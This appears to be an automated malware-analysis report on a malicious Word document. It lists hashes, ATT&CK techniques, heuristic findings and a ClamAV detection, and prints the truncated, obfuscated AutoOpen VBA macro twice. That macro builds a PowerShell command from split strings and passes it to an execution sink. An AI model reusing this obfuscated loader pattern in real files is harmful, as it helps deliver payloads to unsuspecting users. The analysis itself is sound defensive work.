Office (OLE) malware analysis — malicious · cf8f0e079cc772ec

MALICIOUS

Office (OLE)

209.0 KB Created: 2018-07-05 06:56:00 Authoring application: Microsoft Office Word First seen: 2018-07-23

MD5: 89b69d2f1b82ea49992cc69e209b485f SHA-1: 56a2c646085b9f865e8a3f42e1c9371eaa85f3b7 SHA-256: cf8f0e079cc772ec4088d7447d4e61444c47fb26c6bada5411bc75adf3890e28

342 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro, which executes automatically upon opening, utilizes Shell() and CreateObject() calls, indicative of payload execution. The presence of an obfuscated auto-exec loader and the ClamAV detection strongly suggest a malicious intent to download and execute a secondary payload.

Heuristics 9

ClamAV: Doc.Malware.Valyria-6874681-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Valyria-6874681-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9311 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9311 bytes
SHA-256: `7f9453dcd57b45f322b75cd8b8e92b528e3ad1da251f2f5282ed27f775abd35c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "iAitPfY" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next CXOWkO = qKNRP - KqITNJ / 83955 - rbkUm / aAspM - RqltuM / NIQFUC / jcUEYV - 53211 * LwdBw - 87431 - pRYEfh PZASi = bWPSn - wjoQrI / 98745 - pPsNzO / whPXQ - WEiXC / PjZNjK / AIdHN - 44120 * pQAhnV - 31438 - cpzvXc CHulq = TtIvsw - VSkKTb / 37907 - boITt / AQkJO - JSuWni / tdQbr / usJHQ - 93642 * nwbSl - 35527 - rTcYli JsoLjv = BJDsN - VZCAi / 42525 - Ezkhj / HkNonc - jTPYL / uAwXjd / XHQzu - 77628 * UXMHH - 58445 - ofnVQ OPtNwm = qqqUAN - BRJnaB / 36439 - XLEEzP / cWPYM - dvzYpW / tfaBA / mDcHwj - 46115 * shIunf - 63027 - UEcAu drPjrZ = JzzUm - cIUsK / 97663 - sRNRr / BFtGIa - iCiNLC / szJiWN / tTsBw - 43546 * zMiwoP - 45423 - PqouM ZFvHKY = HJiMUw - ClXWEw / 78553 - wPQKm / fzjDw - BYtIq / XhGBR / XWjWcr - 87091 * zIHjq - 99311 - WcMuIV LPlfP = rlDDYc - APSso / 8256 - NoiBqW / KVYAjO - QrLBIu / wFqPD / NElkMp - 75200 * Wkjos - 14614 - PiDrNa BJiokb = FZBEd - zUQtw / 41709 - IGHQh / GUKCTN - tGGSG / iORmG / AtoLX - 53967 * ujWuC - 27051 - oVluX HqfJk = jnlnw - Gkonq / 53287 - uHbNQ / ThbnXp - djitjj / snzzA / paipPA - 72647 * oQfdP - 42382 - jHAOz NGFGBwZGtDoG (zaCss + vQEKaXLN + OVARQYsRGJ) TEoYmB = LcnaV - PkRflK / 84327 - VdXwQ / ihpbS - AKmujv / jAthro / VjLpC - 74567 * bwbRc - 43436 - dimLHY wXwph = JcwfH - tzVAZ / 61525 - ZMKdE / qCVHV - QYQloq / FOSWi / VMtiIl - 73296 * CIrnuu - 31344 - JnUavr HhHYIt = iviFH - BFKDdf / 82501 - PWmDq / TubAkU - kUqwoG / zCKKP / Nlirj - 10981 * isLVUR - 19411 - kTdUnz NjJMaI = qfrjM - YNVjIN / 31049 - zuwwO / fBEpd - RQbbZB / BBHCKD / kZzrnd - 41710 * QlMQM - 7294 - pbBFmf End Sub Attribute VB_Name = "tKGUPXqrlsTU" Function zaCss() On Error Resume Next ovFMEp = 63253 + 18513 * (qZWzT + jFcjsr / 18490 / VuLYF * cUOuS + KorkQA / 87959 + UlmGQf) XWsJq = "wershe" + "ll " + " " + " [ST" + "RING]::jO" + "In" + Chr(40) + " '' " uMKRpX = 83097 + 18669 * (zJnJC + YLEwD / 50685 / qoAUSq * FJzfZ + DutQIm / 95340 + EPEoW) mWNWIw = (WRVEA * PqMHk / 46093 - iRnoQ + jlYvfw * WSmjJ / hhYcv + lzCOD * 93111 / wRIVj) IOoiY = 68936 + 34049 * (RbmdVK + jhkuNs / 36350 / zUDkHF * ZPEKG + dHmEZr / 97262 + HLwaK) TmsLHjN = "," + Chr(40) + " '8>79" + "z65{6" + "9}17!" + "66>73" + "z91}1!67" + "{78&70o7" + "3&79" + "z88f12!9" + "8!73{88v" + "2o123&" + "73}78t1" PAARv = (Ynihkp * LZMsBr / 79054 - LQKWd + fkzlsk * EDJKCA / sXwHzl + MAlTWV * 96398 / kqvRw) hwsED = (VDizq * PnSCW / 83379 - SkLRWO + BTSPkC * pqCPui / qwDUfQ + PSnYaB * 50166 / WiVqR) QkzVpI = (dzDcwU * lFprkf / 60626 - XUzbzo + wCKDl * zaHGv / TEKbzj + jCjso * 50624 / mMdVN) fiDDotfd = "11>64f6" + "9v73>6" + "6}88t2" + "3!8}86&1" + "11t127" + "v17&1" + "1z68z88}8" SOoOZz = (ncJPc * IzqwDl / 2289 - qKBQXU + tERbo * kGrCJ / CAvRm + fNhfrN * 38576 / FcDnz) SVQjMTJzJ = "8}92&2" + "2f3f3v91" + "v91f91" + "v2!77" + "{72{90" + "f67!71f77" + "{88&1!9" + "5v66f" + "75&2" + "t79!" + "67z65" UPovr = (inXXTP * oRAjQ / 68702 - kfbrf + wSKbMk * IjZCj / hWOEK + JVVFzw * 90018 / YQoow) tYsnob = (qzvtT * iutOSs / 12804 - OMDHmG + CEEHo * HXZzJ / pqfvT + CbhKY * 58539 / WAfLo) vHXGupr = "{3o7" + "8>64f6" + "7t75&3f1" + "16t70!72v" + "73!107>" + "89!3f108t" MdvKjv = (EswzM * kVbRA / 43001 - cMKfR + urvkGT * tKlJzH / UQNBw + CovNXv * 87687 / KzSPt) lbJDTi = "68v88o88&" + "92}22f3o3" + "v91>91!91" + "{2o72}67{" + "71o77o9" + "5t95{73" + "}95&9" + "5f67{9" + "4v69o7" + "7}2{" + "79v6" vZPQY = (pvYEt * RXitln / 15222 - pBkKJ + vcSzj * cMPVw / WtMoCu + JPmsA * 52100 / mYPuoE) JHrfY = (ajSRt * kMzJi / 66687 - GwiNKa + jKTtFD * LHFJR / uNLvF + kawzJ * 63017 / btMbt) wVoARb = "7z65t2}78" + ">94{3v79" + "z111" + "f73>101t3" + "1{3f1" + "08t6" + "8{88" + "o88{9" + "2t22" + "o3z3&91" + "!91t91}2{" + "69z66&" zaCss = XWsJq + TmsLHjN + fiDDotfd + SVQjM ... (truncated)

SHA-256: 7f9453dcd57b45f322b75cd8b8e92b528e3ad1da251f2f5282ed27f775abd35c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "iAitPfY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   CXOWkO = qKNRP - KqITNJ / 83955 - rbkUm / aAspM - RqltuM / NIQFUC / jcUEYV - 53211 * LwdBw - 87431 - pRYEfh
   PZASi = bWPSn - wjoQrI / 98745 - pPsNzO / whPXQ - WEiXC / PjZNjK / AIdHN - 44120 * pQAhnV - 31438 - cpzvXc
   CHulq = TtIvsw - VSkKTb / 37907 - boITt / AQkJO - JSuWni / tdQbr / usJHQ - 93642 * nwbSl - 35527 - rTcYli
   JsoLjv = BJDsN - VZCAi / 42525 - Ezkhj / HkNonc - jTPYL / uAwXjd / XHQzu - 77628 * UXMHH - 58445 - ofnVQ
   OPtNwm = qqqUAN - BRJnaB / 36439 - XLEEzP / cWPYM - dvzYpW / tfaBA / mDcHwj - 46115 * shIunf - 63027 - UEcAu
   drPjrZ = JzzUm - cIUsK / 97663 - sRNRr / BFtGIa - iCiNLC / szJiWN / tTsBw - 43546 * zMiwoP - 45423 - PqouM
   ZFvHKY = HJiMUw - ClXWEw / 78553 - wPQKm / fzjDw - BYtIq / XhGBR / XWjWcr - 87091 * zIHjq - 99311 - WcMuIV
   LPlfP = rlDDYc - APSso / 8256 - NoiBqW / KVYAjO - QrLBIu / wFqPD / NElkMp - 75200 * Wkjos - 14614 - PiDrNa
   BJiokb = FZBEd - zUQtw / 41709 - IGHQh / GUKCTN - tGGSG / iORmG / AtoLX - 53967 * ujWuC - 27051 - oVluX
   HqfJk = jnlnw - Gkonq / 53287 - uHbNQ / ThbnXp - djitjj / snzzA / paipPA - 72647 * oQfdP - 42382 - jHAOz
NGFGBwZGtDoG (zaCss + vQEKaXLN + OVARQYsRGJ)
   TEoYmB = LcnaV - PkRflK / 84327 - VdXwQ / ihpbS - AKmujv / jAthro / VjLpC - 74567 * bwbRc - 43436 - dimLHY
   wXwph = JcwfH - tzVAZ / 61525 - ZMKdE / qCVHV - QYQloq / FOSWi / VMtiIl - 73296 * CIrnuu - 31344 - JnUavr
   HhHYIt = iviFH - BFKDdf / 82501 - PWmDq / TubAkU - kUqwoG / zCKKP / Nlirj - 10981 * isLVUR - 19411 - kTdUnz
   NjJMaI = qfrjM - YNVjIN / 31049 - zuwwO / fBEpd - RQbbZB / BBHCKD / kZzrnd - 41710 * QlMQM - 7294 - pbBFmf
End Sub


Attribute VB_Name = "tKGUPXqrlsTU"
Function zaCss()
On Error Resume Next
ovFMEp = 63253 + 18513 * (qZWzT + jFcjsr / 18490 / VuLYF * cUOuS + KorkQA / 87959 + UlmGQf)
XWsJq = "wershe" + "ll     " + "         " + "    [ST" + "RING]::jO" + "In" + Chr(40) + " '' "
uMKRpX = 83097 + 18669 * (zJnJC + YLEwD / 50685 / qoAUSq * FJzfZ + DutQIm / 95340 + EPEoW)
   mWNWIw = (WRVEA * PqMHk / 46093 - iRnoQ + jlYvfw * WSmjJ / hhYcv + lzCOD * 93111 / wRIVj)
   IOoiY = 68936 + 34049 * (RbmdVK + jhkuNs / 36350 / zUDkHF * ZPEKG + dHmEZr / 97262 + HLwaK)
TmsLHjN = "," + Chr(40) + " '8>79" + "z65{6" + "9}17!" + "66>73" + "z91}1!67" + "{78&70o7" + "3&79" + "z88f12!9" + "8!73{88v" + "2o123&" + "73}78t1"
PAARv = (Ynihkp * LZMsBr / 79054 - LQKWd + fkzlsk * EDJKCA / sXwHzl + MAlTWV * 96398 / kqvRw)
   hwsED = (VDizq * PnSCW / 83379 - SkLRWO + BTSPkC * pqCPui / qwDUfQ + PSnYaB * 50166 / WiVqR)
   QkzVpI = (dzDcwU * lFprkf / 60626 - XUzbzo + wCKDl * zaHGv / TEKbzj + jCjso * 50624 / mMdVN)
fiDDotfd = "11>64f6" + "9v73>6" + "6}88t2" + "3!8}86&1" + "11t127" + "v17&1" + "1z68z88}8"
SOoOZz = (ncJPc * IzqwDl / 2289 - qKBQXU + tERbo * kGrCJ / CAvRm + fNhfrN * 38576 / FcDnz)
SVQjMTJzJ = "8}92&2" + "2f3f3v91" + "v91f91" + "v2!77" + "{72{90" + "f67!71f77" + "{88&1!9" + "5v66f" + "75&2" + "t79!" + "67z65"
UPovr = (inXXTP * oRAjQ / 68702 - kfbrf + wSKbMk * IjZCj / hWOEK + JVVFzw * 90018 / YQoow)
   tYsnob = (qzvtT * iutOSs / 12804 - OMDHmG + CEEHo * HXZzJ / pqfvT + CbhKY * 58539 / WAfLo)
vHXGupr = "{3o7" + "8>64f6" + "7t75&3f1" + "16t70!72v" + "73!107>" + "89!3f108t"
MdvKjv = (EswzM * kVbRA / 43001 - cMKfR + urvkGT * tKlJzH / UQNBw + CovNXv * 87687 / KzSPt)
lbJDTi = "68v88o88&" + "92}22f3o3" + "v91>91!91" + "{2o72}67{" + "71o77o9" + "5t95{73" + "}95&9" + "5f67{9" + "4v69o7" + "7}2{" + "79v6"
vZPQY = (pvYEt * RXitln / 15222 - pBkKJ + vcSzj * cMPVw / WtMoCu + JPmsA * 52100 / mYPuoE)
   JHrfY = (ajSRt * kMzJi / 66687 - GwiNKa + jKTtFD * LHFJR / uNLvF + kawzJ * 63017 / btMbt)
wVoARb = "7z65t2}78" + ">94{3v79" + "z111" + "f73>101t3" + "1{3f1" + "08t6" + "8{88" + "o88{9" + "2t22" + "o3z3&91" + "!91t91}2{" + "69z66&"
zaCss = XWsJq + TmsLHjN + fiDDotfd + SVQjM
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.